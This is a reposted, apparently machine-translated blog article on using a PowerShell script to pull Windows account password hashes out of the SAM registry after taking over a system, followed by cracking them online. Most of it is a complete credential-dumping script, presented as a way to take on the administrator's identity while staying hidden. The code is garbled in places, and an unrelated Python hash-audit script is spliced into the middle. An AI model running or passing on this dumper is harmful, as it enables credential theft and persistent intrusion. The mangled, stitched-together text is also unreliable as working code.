Get Windows System password hash via PowerShell

Source: Internet
Author: User

Once you have taken control of a system, how do you keep that control for a longer period? As a white hat who has torn a hole in the opponent's line of defense, expanding the foothold means lying low and collecting more information on which to base your judgment, so that the eventual harvest is greater. Which method gives the highest privileges while hiding you most effectively: leaving a webshell, leaving a backdoor, planting a Trojan, or a rootkit? A webshell, even a one-line Trojan, is easily cleared by the administrator; a planted Trojan is just as easily found by an experienced administrator, whether it creates its own process (which is killed as soon as it is noticed), injects itself into another process, runs as a self-starting service, or even replaces a system service so that it starts with it: the concealment is simply too poor. However perfect the backdoor and however well the Trojan evades antivirus, it does little good; in the end it is best to leave no trace at all.

What approach achieves the goal without being easily discovered? Managing the server exactly as the administrator does. Whether the administrator uses 3389 (RDP), pcAnywhere or Radmin to manage the server, obtain his password and enter the system under his identity; if it is the domain administrator's password, the whole domain is under your control. Besides network sniffing, the password can also be recovered by attacking the password hash with rainbow tables. This article introduces a PowerShell method of obtaining the Windows system password hash; with the hash in hand, the password is not far away.

First, an introduction to the Windows password hash:

Early versions of the SMB protocol transmitted passwords in plaintext over the network. Later came the "LAN Manager challenge/response" authentication mechanism, LM for short, which is so simple that it is easily cracked. Microsoft then proposed the Windows NT challenge/response mechanism, NTLM, and today there are the newer NTLMv2 and Kerberos authentication systems. Windows stores the password in an encrypted form that we call the hash. By default, a Windows system password hash generally consists of two parts: the first is the LM-hash, the second the NTLM-hash.

Compared with the LM-hash algorithm, the NTLM-hash is case-sensitive in the plaintext password, gives no way to tell from the hash whether the original plaintext is shorter than 8 bytes, and does away with the magic string "KGS!@#$%". MD4 is a true one-way hash function, and brute-forcing the plaintext that produced it is harder. The problem is that while Microsoft insists the NTLM-hash is stronger, it keeps the LM-hash alongside it in the name of backward compatibility, so by default the NTLM-hash is always stored together with the LM-hash. This means that however strong the NTLM-hash is, the result is not safe, and can even potentially harm security: with the NTLM-hash added, an attacker first exploits the weakness of the LM-hash to brute-force the case-insensitive version of the original plaintext password, then uses the NTLM-hash to correct it to the case-sensitive version.

The format of a password hash line on Windows is username:RID:LM-hash:NT-hash, for example:

ADMINISTRATOR:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::

which indicates:

Username: Administrator

RID: 500

LM-hash value: C8825db10f2590eaaad3b435b51404ee

NT-hash value: 683020925c5d8569c23aa724774ce6cc

If you know this user's hash, take c8825db10f2590eaaad3b435b51404ee:683020925c5d8569c23aa724774ce6cc to the online hash lookup site

Http://www.objectif-securite.ch/en/ophcrack.php and the password is easily obtained.
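The format described above lends itself to an automated audit of a hash dump for exactly the weaknesses this section explains: LM hashes still being stored, the empty second LM half that betrays a password of at most 7 characters, blank passwords, and the same NT hash reused across accounts. The following Python script is an added example, not part of the original article or its script; its sample dump is constructed, with the Administrator line taken from the example above and the other two accounts made up.

```python
"""Audit pwdump-format lines (user:RID:LM:NT:::) for weak hash storage.
Added example, not from the original article. SAMPLE_DUMP is constructed: the
Administrator line is the article's own example, the other two are made up.
EMPTY_LM / EMPTY_NT are the well-known hashes of an empty password."""
import re
from typing import NamedTuple

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # same bytes as the script's $empty_lm
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # same bytes as the script's $empty_nt
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")
SAMPLE_DUMP = """
Administrator:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:683020925c5d8569c23aa724774ce6cc:::
"""

class HashEntry(NamedTuple):
    user: str
    rid: int
    lm: str   # LM hash, lower-case hex
    nt: str   # NT hash, lower-case hex

def parse_pwdump_line(line: str) -> HashEntry:
    """Split one user:RID:LM:NT::: line; hashes are normalised to lower case."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a pwdump line: {line!r}")
    user, rid, lm, nt = m.groups()
    return HashEntry(user, int(rid), lm.lower(), nt.lower())

def audit_entry(e: HashEntry) -> list:
    """Findings for one account, based only on what the hash line reveals."""
    findings = []
    if e.lm != EMPTY_LM:
        findings.append("LM hash present: case-insensitive, two 7-char halves")
        # LM hashes each 7-byte half separately, so an empty second half
        # shows the plaintext was at most 7 characters long.
        if e.lm[16:] == EMPTY_LM[16:]:
            findings.append("password is at most 7 characters (second LM half is empty)")
    if e.nt == EMPTY_NT:
        findings.append("blank password (NT hash of the empty string)")
    return findings

def audit_dump(lines) -> dict:
    """Audit a whole dump; also flags accounts sharing an NT hash (password reuse)."""
    entries = [parse_pwdump_line(l) for l in lines if l.strip()]
    report = {e.user: audit_entry(e) for e in entries}
    by_nt = {}
    for e in entries:
        by_nt.setdefault(e.nt, []).append(e.user)
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            for u in users:
                report[u].append("NT hash shared with: " + ", ".join(x for x in users if x != u))
    return report
```

Run `audit_dump(SAMPLE_DUMP.splitlines())` to get a per-account list of findings; an empty list means the line showed nothing wrong.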

The code comes first, then a brief explanation of it, and finally a demonstration of running it.

function get-winpasshashes{<# author:fuhj (powershell#live.cn, http://fuhaijun.com) # Get Windows password hash and Returns the hash list #. Example # get-winpasshashes # #> [Cmdletbinding ()] Param () function loadapi{$oldErrorAction = $glo    Bal:erroractionpreference;    $global: erroractionpreference = "Silentlycontinue";    $test = [Powerdump.native];    $global: erroractionpreference = $oldErrorAction;     if ($test) {# already loaded return; } $code = @ ' using system;using system.security.cryptography;using system.runtime.interopservices;using System.Text; Namespace powerdump{public class Native {[DllImport ("advapi32.dll", CharSet = CharSet.Auto)] public static extern int RegOpenKeyEx (int hKey, string subkey, int uloptions, int samdesired, out in    T hkresult);        [DllImport ("advapi32.dll", EntryPoint = "RegEnumKeyEx")] extern public static int RegEnumKeyEx (int hkey, IntIndex, StringBuilder lpname, ref int lpcbname, int reserved, StringBuilder lpclass, ref    int Lpcbclass, out long lpftlastwritetime); [DllImport ("Advapi32.dll", entrypoint= "RegQueryInfoKey", Callingconvention=callingconvention.winapi, SetLastError =true)] extern public static int RegQueryInfoKey (int hkey, StringBuilder lpclass, ref int LPCBCLA        SS, int lpreserved, out int lpcsubkeys, out int lpcbmaxsubkeylen, out int Lpcbmaxclasslen, out int lpcvalues, out int lpcbmaxvaluenamelen, out int lpcbmaxvaluelen, out int Lpcbsecuritydesc    Riptor, IntPtr lpftlastwritetime);        [DllImport ("Advapi32.dll", setlasterror=true)] public static extern int RegCloseKey (int hKey); }}//End namespace Powerdump public class Shift {public static int right (int x, int count) {return x >> count; public static UINT Right (UINT x, intCount) {return x >> count;}        public static long right (long x, int count) {return x >> count;}        public static ULONG right (ulong x, int count) {return x >> count;}        public static int left (int x, int count) {return x << count;}        public 
static UINT Left (UINT x, int count) {return x << count;}        public static long left (long x, int count) {return x << count;}    public static ULONG left (ULONG x, int count) {return x << count;} } ' @ $provider = new-object Microsoft.CSharp.CSharpCodeProvider $dllName = [PsObject]. Assembly.location $compilerParameters = new-object System.CodeDom.Compiler.CompilerParameters $assemblies = @ ("System . dll ", $dllName) $compilerParameters. Referencedassemblies.addrange ($assemblies) $ Compilerparameters.generateinmemory = $true $compilerResults = $provider.  CompileAssemblyFromSource ($compilerParameters, $code) if ($compilerResults. errors.count-gt 0) {   $compilerResults. Errors | % {Write-error ("{0}: ' T{1}"-F $_. Line,$_. ErrorText)}}} $antpassword = [Text.encoding]::ascii. GetBytes ("Ntpassword ' 0"); $almpassword = [Text.encoding]::ascii. GetBytes ("Lmpassword ' 0"); $empty _lm = [byte[]]@ (0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5, 0x14,0x04,0xee); $empty _nt = [byte[]]@ (0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89 , 0xc0); $odd _parity = @ (1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14, 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26 , 26, 28, 28, 31, 31, 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47, 49, 49, 50, 50, 52, 52, 55, 55 , 56, 59, 59, 61, 61, 62, 62, 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79, 81, 81, 82, 82, 84, 84 , 87, 88, 88, 91, 91, 93, 93, 94, 94, 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110, 112,112,115,115,11 7,117,118,118,121,121,122,122,124,124,127,127, 128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143, 145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,  161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,  176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,  193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,  
208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,  224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,    241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254); function Sid_to_key ($sid) {$s 1 = @ ();    $s 1 + = [Char] ($sid-band 0xFF);    $s 1 + = [char] ([Shift]::right ($sid, 8)-band 0xFF);    $s 1 + = [char] ([Shift]::right ($sid,-band) 0xFF);    $s 1 + = [char] ([Shift]::right ($sid,-band) 0xFF);    $s 1 + = $s 1[0];    $s 1 + = $s 1[1];    $s 1 + = $s 1[2];    $s 2 = @ (); $s 2 + = $s 1[3]; $s 2 + = $s 1[0]; $s 2 + = $s 1[1];    $s 2 + = $s 1[2]; $s 2 + = $s 2[0]; $s 2 + = $s 2[1];    $s 2 + = $s 2[2]; Return, ((Str_to_key $s 1), (Str_to_key $s 2));}    function Str_to_key ($s) {$key = @ (); $key + = [Shift]:: Right ([int] ($s [0]), 1);    $key + = [Shift]::left ($ ([int] ($s [0])-band 0x01), 6)-bor [Shift]::right ([int] ($s [1]), 2);    $key + = [Shift]::left ($ ([int] ($s [1])-band 0x03), 5)-bor [Shift]::right ([int] ($s [2]), 3);    $key + = [Shift]::left ($ ([int] ($s [2])-band 0x07), 4)-bor [Shift]::right ([int] ($s [3]), 4);    $key + = [Shift]::left ($ ([int] ($s [3])-band 0x0F), 3)-bor [Shift]::right ([int] ($s [4]), 5);    $key + = [Shift]::left ($ ([int] ($s [4])-band 0x1F), 2)-bor [Shift]::right ([int] ($s [5]), 6);    $key + = [Shift]::left ($ ([int] ($s [5])-band 0x3F), 1)-bor [Shift]::right ([int] ($s [6]), 7);    $key + = $ ([int] ($s [6])-band 0x7F); 0..7 |        %{$key [$_] = [Shift]::left ($key [$_], 1);        $key [$_] = $odd _parity[$key [$_]]; } return, $key;}    function NewRC4 ([byte[]] $key) {return New-object object |    Add-member noteproperty key $key-passthru |    Add-member noteproperty S $null-passthru | Add-member scriptmethod init {if (-not $this. S) {[byte[]] $tHis.            S = 0..255; 0..255 | %-begin{[long] $j = 0;} {$j = ($j + $this. key[$ ($_% $this. Key.length)] + $this. S[$_])% $this.                S.length; $temp = $this. S[$_]; $this. S[$_] = $this. s[$j]; $this.            
    s[$j] = $temp;    }}}-passthru |        Add-member Scriptmethod "Encrypt" {$data = $args [0];        $this. Init (); $outbuf = New-object byte[] $ ($data.        Length); $S 2 = $this. S[0: $this.        S.length]; 0..$ ($data. LENGTH-1) | %-begin{$i =0; $j = 0;} {$i = ($i + 1)% $S 2.            Length; $j = ($j + $S 2[$i])% $S 2.            Length;            $temp = $S 2[$i]; $S 2[$i] = $S 2[$j]; $S 2[$j] = $temp;            $a = $data [$_]; $b = $S 2[$ ($S 2[$i]+ $S 2[$j])% $S 2.            Length];        $outbuf [$_] = ($a-bxor $b);    } return, $outbuf; }-passthru}function Des_encrypt ([byte[]] $data, [byte[]] $key) {return, (Des_transform $data $key $true)}function Des_de Crypt ([byte[]] $data, [byte[]] $key) {return, (Des_transform $Data $key $false)}function des_transform ([byte[]] $data, [byte[]] $key, $doEncrypt) {$des = New-object Security.cryptogra Phy.    DESCryptoServiceProvider; $des.    Mode = [SECURITY.CRYPTOGRAPHY.CIPHERMODE]::ECB; $des.    Padding = [Security.cryptography.paddingmode]::none; $des.    Key = $key;    $des. IV = $key;    $transform = $null; if ($doEncrypt) {$transform = $des.    CreateEncryptor ();} else{$transform = $des.    CreateDecryptor ();} $result = $transform. TransformFinalBlock ($data, 0, $data.    Length); return, $result;} function Get-regkeyclass ([string] $key, [string] $subkey) {switch ($Key) {"HKCR" {$nKey = 0x80000000} #HK Classe S Root "HKCU" {$nKey = 0x80000001} #HK current User ' HKLM ' {$nKey = 0x80000002} #HK Local Machine " HKU "{$nKey = 0x80000003} #HK Users" HKCC "{$nKey = 0x80000005} #HK current Config default {t Hrow "Invalid Key. 
Use one of the following options HKCR, HKCU, HKLM, HKU, HKCC "}} $KEYQUERYVALUE = 0x1;    $KEYREAD = 0x19;    $KEYALLACCESS = 0x3F;    $result = ""; [INT] $hkey =0 if (-not [Powerdump.native]::regopenkeyex ($nkey, $subkey, 0, $KEYREAD, [ref] $hkey)) {$classVal = Ne W-object text.stringbuilder 1024x768 [int] $len = 1024x768 if (-not [Powerdump.native]::regqueryinfokey ($hkey, $classV            Al,[ref] $len, 0,[ref] $null, [ref] $null, [ref] $null, [ref] $null, [ref] $null, [ref] $null, [ref] $null, 0)) {        $result = $classVal. ToString ()} else {Write-error "RegQueryInfoKey failed"; } [Powerdump.native]::regclosekey ($hkey) |    Out-null} else {Write-error "Cannot open key"; } return $result;} function get-bootkey{$s = [String]::join ("", $ ("JD", "Skew1", "GBG", "Data" |%{get-regkeyclass "HKLM" "System\currentcon"    Trolset\control\lsa\$_ "}));    $b = New-object byte[] $ ($s. LENGTH/2); 0..$ ($b. Length-1) | %{$b [$_] = [Convert]::tobyte ($s. Substring ($ ($_*2), 2), +)} $b 2 = New-object byte[] 16; 0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 | %-begin{$i = 0;} {$b 2[$i]= $b [$_]; $i + +} return, $b 2;}    function get-hbootkey{param ([byte[]] $bootkey); $aqwerty = [Text.encoding]::ascii.    GetBytes ("[email protected]#$%^&* () qwertyuiopazxcvbnmqqqqqqqqqqqq) (*@&% ' 0"); $anum = [Text.encoding]::ascii.    GetBytes ("0123456789012345678901234567890123456789 ' 0");    $k = Get-item Hklm:\sam\sam\domains\account;    if (-not $k) {return $null} [byte[]] $F = $k. GetValue ("F"); if (-not $F) {return $null} $rc 4key = [Security.cryptography.md5]::create (). ComputeHash ($F [0x70.    0x7F] + $aqwerty + $bootkey + $anum);    $RC 4 = NewRC4 $RC 4key; Return, ($RC 4.encrypt ($F [0x80]. 0x9F]));}    function Get-username ([byte[]] $V) {if (-not $V) {return $null}; $offset = [Bitconverter]::toint32 ($V [0x0c].    0x0f],0) + 0xCC; $len = [Bitconverter]::toint32 ($V [0x10].    
0x13],0); return [Text.encoding]::unicode.getstring ($V, $offset, $len);} function Get-userhAshes ($u, [byte[]] $hbootkey) {[byte[]] $enc _lm_hash = $null;    [byte[]] $enc _nt_hash = $null;        if ($u. Hashoffset + 0x28-lt $u. V.length) {$lm _hash_offset = $u. Hashoffset + 4;        $nt _hash_offset = $u. Hashoffset + 8 + 0x10; $enc _lm_hash = $u. v[$ ($lm _hash_offset):        $ ($lm _hash_offset+0x0f)]; $enc _nt_hash = $u. v[$ ($nt _hash_offset):    $ ($nt _hash_offset+0x0f)];        } elseif ($u. Hashoffset + 0x14-lt $u. V.length) {$nt _hash_offset = $u. Hashoffset + 8; $enc _nt_hash = [byte[]] $u. v[$ ($nt _hash_offset).    $ ($nt _hash_offset+0x0f)]; } return, (Decrypthashes $u. Rid $enc _lm_hash $enc _nt_hash $hbootkey);} function Decrypthashes ($rid, [byte[]] $enc _lm_hash, [byte[]] $enc _nt_hash, [byte[]] $hbootkey) {[byte[]] $lmhash = $empty _LM;    [byte[]] $nthash = $empty _nt;    # LM Hash if ($enc _lm_hash) {$lmhash = Decryptsinglehash $rid $hbootkey $enc _lm_hash $almpassword; } # NT Hash if ($enc _nt_hash) {$nthash = Decryptsinglehash $rid $hboOtkey $enc _nt_hash $antpassword; } return, ($lmhash, $nthash)}function Decryptsinglehash ($rid, [byte[]] $hbootkey, [byte[]] $enc _hash,[byte[]] $lmntstr)    {$deskeys = Sid_to_key $rid;    $MD 5 = [Security.cryptography.md5]::create ();    $RC 4_key = $md 5.ComputeHash ($hbootkey [0..0x0f] + [Bitconverter]::getbytes ($rid) + $lmntstr);    $RC 4 = NewRC4 $RC 4_key;    $obfkey = $RC 4.encrypt ($enc _hash); $hash = (Des_decrypt $obfkey [0..7] $deskeys [0]) + (Des_decrypt $obfkey [8..$ ($obfkey.    LENGTH-1)] $deskeys [1]); return, $hash;}        function get-userkeys{ls hklm:\sam\sam\domains\account\users | where {$_.            Pschildname-match "^[0-9a-fa-f]{8}$"} |            Add-member Aliasproperty KeyName Pschildname-passthru | Add-member scriptproperty Rid {[Convert]::toint32 ($this.            pschildname)}-passthru | Add-member scriptproperty V {[byte[]] ($this.            
GetValue ("V"))}-passthru | Add-member scriptproperty UserName {get-username ($this. GetValue ("V"))}-passthru| Add-member scriptproperty Hashoffset {[Bitconverter]::touint32 ($this. GetValue ("V") [0x9c.    0x9f],0) + 0xCC}-passthru}function dumphashes{Loadapi $bootkey = Get-bootkey;    $hbootKey = Get-hbootkey $bootkey; Get-userkeys |        %{$hashes = get-userhashes $_ $hBootKey; "{0}:{1}:{2}:{3}:::"-f ($_. Username,$_. Rid, [bitconverter]::tostring ($hashes [0]). Replace ("-", ""). ToLower (), [Bitconverter]::tostring ($hashes [1]). Replace ("-", "").    ToLower ()); }}dumphashes}

Get-WinPassHashes defines several functions internally, and DumpHashes, called at the end of the function, is the entry point.

The result of running it is shown below.

With the hash in hand, cracking the password goes quickly. ^_^

Author: Fu Haijun
Source: http://fuhj02.cnblogs.com
Copyright: This article is jointly owned by the author and Blog Park (cnblogs).
Reprinting: Reprints are welcome; to preserve the author's enthusiasm for writing, please reprint according to the requirements below. Thank you.
Requirements: Without the author's consent, this statement must be retained and a link to the original given in the article; otherwise legal liability will be pursued.
Personal website: http://www.fuhaijun.com/

